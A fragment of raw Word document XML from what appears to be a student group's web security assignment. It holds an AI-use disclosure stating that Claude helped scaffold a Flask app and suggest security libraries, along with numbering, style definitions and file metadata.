      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF34B5">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Claude (Anthropic) was used as an AI coding assistant throughout this assignment. Specifically, Claude was used to generate initial code scaffolding for the Flask application, suggest implementations for security libraries including bcrypt, Flask-WTF, Flask-Limiter, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF34B5">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>PyJWT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF34B5">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF34B5">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>assist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF34B5">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with document formatting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF34B5" w:rsidRPr="00CF34B5" w:rsidRDefault="00CF34B5" w:rsidP="00CF34B5">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF34B5">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>All generated code was reviewed, tested, and verified by the group on a locally running application. All exploit demonstrations were independently executed by the group and all screenshots represent actual results from our own test environment. Vulnerability classifications, CVSS scores, and security analysis were verified against MITRE CWE, NIST NVD, and OWASP documentation. The group takes full responsibility for the content, accuracy, and understanding of all submitted work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="00A1776E" w:rsidP="00CF34B5">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A177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DA54B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7302984"/>
    <w:lvl w:ilvl="0" w:tplc="3A986D62">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AC4A4404">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="999C703C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2DC66588">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="839450BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="23467B5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="14320DE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EBC46EC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="82D0EE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76E"/>
    <w:rsid w:val="009755AE"/>
    <w:rsid w:val="009C14D2"/>
    <w:rsid w:val="00A1776E"/>
    <w:rsid w:val="00AE53EC"/>
    <w:rsid w:val="00B970AF"/>
    <w:rsid w:val="00CF34B5"/>
    <w:rsid w:val="00E74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028044-D989-4971-ABBD-B5C5D9C8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F34B5"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00CF34B5"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00B970AF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B970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80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2862</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cp:lastPrinted>2026-05-04T15:31:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-04T14:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-04T15:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>